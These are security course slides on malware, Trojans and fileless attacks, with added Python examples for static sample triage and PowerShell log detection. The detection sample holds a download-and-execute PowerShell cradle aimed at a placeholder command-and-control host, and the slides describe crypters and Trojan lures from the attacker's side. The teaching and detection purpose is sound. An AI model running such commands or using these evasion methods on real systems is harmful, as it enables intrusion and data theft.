CIS 4500, Chapter #9: Trojans and Other Attacks
Source: rowdysites.msudenver.edu/~fustos/cis4500/pdf/chapter09.pdf

Outline
• Describe malware types and their purpose
• Identify malware deployment methods
• Describe the malware analysis process
• Identify malware countermeasures
• Describe DoS attacks and techniques
• Identify DoS detection and countermeasure actions
• Describe session hijacking and sequence prediction

The “Malware” Attacks
• Malware is generally defined as software designed to harm or secretly access a computer system without the owner’s informed consent
• The security profession thinks of it as hostile, intrusive, annoying, and definitely something to be avoided
• Most malware is simply downloaded from the Internet, with or without the user’s knowledge

The “Malware” Attacks
• Software is considered to be malware based on the perceived intent of the creator rather than any particular features
• Most people think of viruses, worms, and Trojans as a means to spread destruction and as a huge inconvenience to computing life; to an ethical hacker the Trojan might actually look like a good means to pull off a successful exploit or to retain access to a machine, since it’s simply one of many tools in the arsenal

Malware
• There are a ton of “legitimate” applications, add-ons, toolbars, and the like that aren’t intended to be malware, but they may as well be
• Is “stealing” data for advertising purposes malware in nature?
• Or how about AV programs flagging applications as viruses and/or malware?

How to Get Malware
• Legitimate sites get compromised, leading to infections on visiting systems
• Drive-by downloading infects the system, usually via some weird Java vulnerability delivered through an ad stream
• Peer-to-peer applications or web application “features” are often hijacked to distribute malware
• An IRC channel is always a great way to distribute malware

How to Get Malware
• The absolute easiest way you can get a target to install your malware is to just ask them to do it for you
• Send malware (usually a Trojan) via e-mail, file sharing, or a browser and, more often than not, they’ll open it and happily install whatever you want

How to Pretend to Be Legitimate
• Wrappers
• Crypters and packers

Wrappers
• Wrappers are programs that allow you to bind an executable of your choice (Trojan) to an innocent file your target won’t mind opening
• Your target opens the application
• Meanwhile, your backdoor is installing and sits there waiting for your use later
• Wrappers have their own signatures and can definitely show up on AV scans

Crypters
• Crypters are software tools that use a combination of encryption and code manipulation to render malware undetectable to AV and other security monitoring products (in Internet lingo, it’s referred to as FUD, for “fully undetectable”)

Packers
• Packers use compression to pack the malware executable into a smaller size
• Besides reducing the file size, packing also makes the malware harder to detect for some antivirus engines
• Both crypters and packers work much like a ZIP file, except that the extraction occurs in memory and not on the disk

Trojans
• A Trojan is software that appears to perform a desirable function for the user prior to running or installing it, but instead performs a function, usually without the user’s knowledge, that steals information or otherwise harms the system (or data)
• The word Trojan really means a method to gain, and maintain, access on a target machine

Trojan Ports

Viruses
• A virus is a self-replicating program that reproduces its code by attaching copies into other executable codes
  - viruses create copies of themselves in other programs
  - they activate on some sort of trigger event (such as a specific user task, a particular time, or an event of some sort)
• They usually get installed on a system via file attachments, user clicks on links embedded in e-mails, or the installation of pirated software

Viruses
• Ransomware
  - this malware locks you out of your own system resources and demands an online payment of some sort in order to release them back to you
  - usually the payment is smaller than the cost it would take to remove the malware and recover anything lost; ransomware is ubiquitous and unfortunately you’ll probably see it somewhere, sometime in your travels
  - examples: Cryptorbit, CryptoLocker, CryptoDefense, and police-themed ransomware

Viruses
• Boot sector virus
  - also known as a system virus
  - moves the boot sector to another location on the hard drive, forcing the virus code to be executed first
  - these viruses are almost impossible to get rid of once you get infected
  - you can re-create the boot record, but it is not easy

Viruses
• Shell virus
  - working just like the boot sector virus, this virus type wraps itself around an application’s code, inserting its own code before the application’s
  - every time the application is run, the virus code is run first
• Cluster virus
  - this virus type modifies directory table entries so that user or system processes are pointed to the virus code itself
  - a single copy of the virus “infects” everything

Viruses
• Multipartite virus
  - this generally refers to a virus with multiple infection vectors
  - attempts to infect both files and the boot sector at the same time
  - multipartite can be combined with other attributes (polymorphic, retroviral, boot sector) and is generally a pretty wild bit of code

Viruses
• Macro virus
  - probably one of the most common malware types you’ll see in today’s world
  - usually written in Visual Basic for Applications (VBA)
  - this virus type infects template files created by Microsoft Office, normally Word and Excel

Viruses
• Polymorphic code virus
  - this virus mutates its code using a built-in polymorphic engine
  - this type of virus is difficult to find and remove because its signature constantly changes
  - no part of the virus stays the same from infection to infection
• Encryption virus
  - this type of virus uses encryption to hide the code from antivirus scanners

Viruses
• Metamorphic virus
  - rewrites itself every time it infects a new file
• Stealth virus
  - also known as a “tunneling virus”
  - attempts to evade antivirus (AV) applications by intercepting the AV’s requests to the operating system (OS) and returning them to itself instead of the OS
  - the virus then alters the requests and sends them back to the AV as uninfected, making the virus now appear “clean”

Viruses
• Cavity virus
  - cavity viruses overwrite portions of host files so as not to increase the actual size of the file
  - this is done using the null content sections of the file and leaves the file’s actual functionality intact
• Sparse infector virus
  - they only infect occasionally, e.g. maybe the virus only fires every tenth time a specific application is run

Viruses
• File extension virus
  - they change the file extensions of files to take advantage of most people having file extension view turned off
  - e.g. readme.txt.vbs might appear as readme.txt with extensions turned off

Virus Makers
• Sonic Bat
• PoisonVirus Maker
• Sam’s Virus Generator
• JPS Virus Maker

Worms
• A worm is a self-replicating malware computer program that uses a computer network to send copies of itself to other systems without human intervention
• Usually it doesn’t alter files, but it resides in active memory and duplicates itself, eating up resources and wreaking havoc along the way
• The most common use for a worm in the hacking world is the creation of botnets

Worms
• Code Red
  - named after the soft drink the eEye Digital guys were drinking when they discovered it
  - exploited indexing software on IIS servers in 2001
  - used a buffer overflow and defaced servers
• Darlloz
  - a worm for “the Internet of Things”; it is a Linux-based worm that targets devices running ARM, MIPS, and PowerPC architectures, which are usually routers, set-top boxes, and security cameras

Worms
• Slammer
  - also known as SQL Slammer
  - a denial-of-service worm attacking buffer overflow weaknesses in Microsoft SQL services; also called Sapphire, SQL_HEL, and
  - it spread quickly using UDP
  - its small size (the entire worm could fit inside a single packet) allowed it to bypass many sensors

Worms
• Nimda
  - the worm’s name comes from the word admin spelled backward
  - Nimda was a successful file infection virus that modified and touched nearly all web content on a machine
  - it spread so quickly it became the most widespread worm in history within about 22 minutes of its first sighting
  - Nimda spread through e-mail, open network shares, and websites, and it also took advantage of backdoors left on machines infected by the Code Red worm

Worms
• Bug Bear
  - propagating over open network shares and e-mail, Bug Bear terminated AV applications and set up a backdoor for later use
  - it also contained keylogging capabilities

Worms
• Pretty Park
  - spread via e-mail (attempting a send every 30 minutes) and took advantage of IRC to propagate stolen passwords and the like
  - running the worm executable often displayed the 3D Pipe screensaver on Windows machines

Malware Analysis
• The first step: have a good test bed
  - using a virtual machine with the NIC in host-only mode and no open shares is a good start
• Analyze the malware on that isolated VM while it’s in a static state
  - tools such as BinText and UPX can help in examining the binary itself as well as the compression and packaging technique
• Next, fire up the malware and check out the processes in use (with Process Monitor and Process Explorer, for example)
• Review network traffic using NetResident, TCPView, or maybe even Wireshark
• Lastly, check to see what files are added, changed, or deleted, what processes continue to spawn, and any changes to the registry
• Tools that can help you with malware analysis include, but are not limited to, IDA Pro (www.hex-rays.com), VirusTotal (www.virustotal.com), Anubis (anubis.iseclab.org), and Threat Analyzer (www.threattracksecurity.com)
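The static part of the process above (hash the binary, pull its strings, and check whether it was packed the way the Packers slide describes) as an added Python example; it is not from the slides, and the sample bytes, the UPX section-name check and the placeholder URL inside them are all constructed for the demo.

```python
import hashlib
import math
import re
from collections import Counter

# Constructed stand-in for a suspicious binary (not a real sample): a PE-like
# header, the UPX section names a packer leaves behind, one embedded URL
# (placeholder host) and 2 KiB of uniformly distributed filler standing in
# for a compressed/encrypted payload body.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"This program cannot be run in DOS mode.\r\n"
    + b"UPX0\x00\x00\x00\x00UPX1\x00\x00\x00\x00"
    + b"http://example.invalid/c2\x00"
    + bytes((13 + 239 * i) % 256 for i in range(2048))
)

def sha256_hex(data: bytes) -> str:
    """Hash used to look the sample up on VirusTotal and to track it in the lab."""
    return hashlib.sha256(data).hexdigest()

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Printable ASCII runs, the same view BinText gives of a binary."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: plain code and text sit well below 7, packed or encrypted data near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def upx_markers(data: bytes) -> list[str]:
    """Section names and signature string UPX writes into a packed PE."""
    return [m for m in ("UPX0", "UPX1", "UPX!") if m.encode() in data]

def triage(data: bytes) -> dict:
    """Static summary an analyst reviews before the sample is ever executed."""
    entropy = shannon_entropy(data)
    markers = upx_markers(data)
    return {
        "sha256": sha256_hex(data),
        "size": len(data),
        "entropy": round(entropy, 2),
        "upx_markers": markers,
        "urls": [s for s in extract_strings(data) if s.startswith(("http://", "https://"))],
        "likely_packed": entropy > 7.0 or bool(markers),
    }

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key:14} {value}")
```

High entropy alone only says the body is compressed or encrypted, so a UPX hit is the cue to unpack (upx -d) and re-run the string extraction on the result.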

Non-Malware (or Fileless) Attack
• A user visits a website using a browser, perhaps driven there from a cleverly disguised spam message
• On this page, Flash is loaded; Flash is a common attack vector due to its seemingly never-ending set of vulnerabilities
• Flash invokes PowerShell, an OS tool that exists on every Windows machine, and feeds it instructions through the command line, all operating in memory
• PowerShell connects to a stealth command and control server, where it downloads a malicious PowerShell script that finds sensitive data and sends it to the attacker
• This attack never downloads any malware
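Because the chain above writes no file for AV to scan, the defender's handle is PowerShell's own script-block logging: this added Python example (not from the slides) scores constructed log lines for the fetch-from-network, run-in-memory and hide-the-console pattern the slide describes. The log line format, host names and URL are assumptions for the demo.

```python
import re

# Constructed script-block log lines (not real telemetry); host names and the
# URL are placeholders. The scoring only looks at the script text, so it applies
# to whatever wrapper your log pipeline puts around the real event message.
SAMPLE_LOG = [
    "host=WS01 block=Get-ChildItem C:\\Users\\alice\\Documents",
    "host=WS01 block=powershell -w hidden -nop -ep bypass -enc QUJDREVGR0hJSktMTU5P",
    "host=WS02 block=IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1')",
    "host=WS03 block=Get-Process | Where-Object { $_.CPU -gt 100 }",
]

# One category per facet of the fileless chain on the slide: pull code over the
# network, execute it from memory, and suppress window/profile/policy while doing so.
INDICATORS = {
    "network_fetch": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "evasion_flags": re.compile(r"-enc(odedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|-ep\s+bypass", re.I),
}

def score_block(block: str) -> dict[str, list[str]]:
    """Matched tokens per indicator category for one script block."""
    found = {}
    for name, rx in INDICATORS.items():
        tokens = [m.group(0) for m in rx.finditer(block)]
        if tokens:
            found[name] = tokens
    return found

def flag_log(lines: list[str], threshold: int = 2) -> list[dict]:
    """Flag lines with at least `threshold` indicator tokens; a single
    Invoke-WebRequest is normal admin activity and too noisy to alert on."""
    hits = []
    for line in lines:
        host, _, block = line.partition(" block=")
        found = score_block(block)
        score = sum(len(t) for t in found.values())
        if score >= threshold:
            hits.append({"host": host.removeprefix("host="), "score": score, "indicators": found})
    return hits

if __name__ == "__main__":
    for hit in flag_log(SAMPLE_LOG):
        print(hit["host"], hit["score"], hit["indicators"])
```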

Tools for Your Lab
• VirtualBox (virtualbox.org), which can also convert between disk formats (.vmdk, .vdi, .vhd)
• DOSBox (dosbox.com)
• VMware Player (vmware.com)
• Free Windows VM (MS Developer)
• Metasploitable (rapid7.com)
• Kali (kali.org)

Stay Alert!
There is no 100 percent secure system, and there is nothing that is foolproof!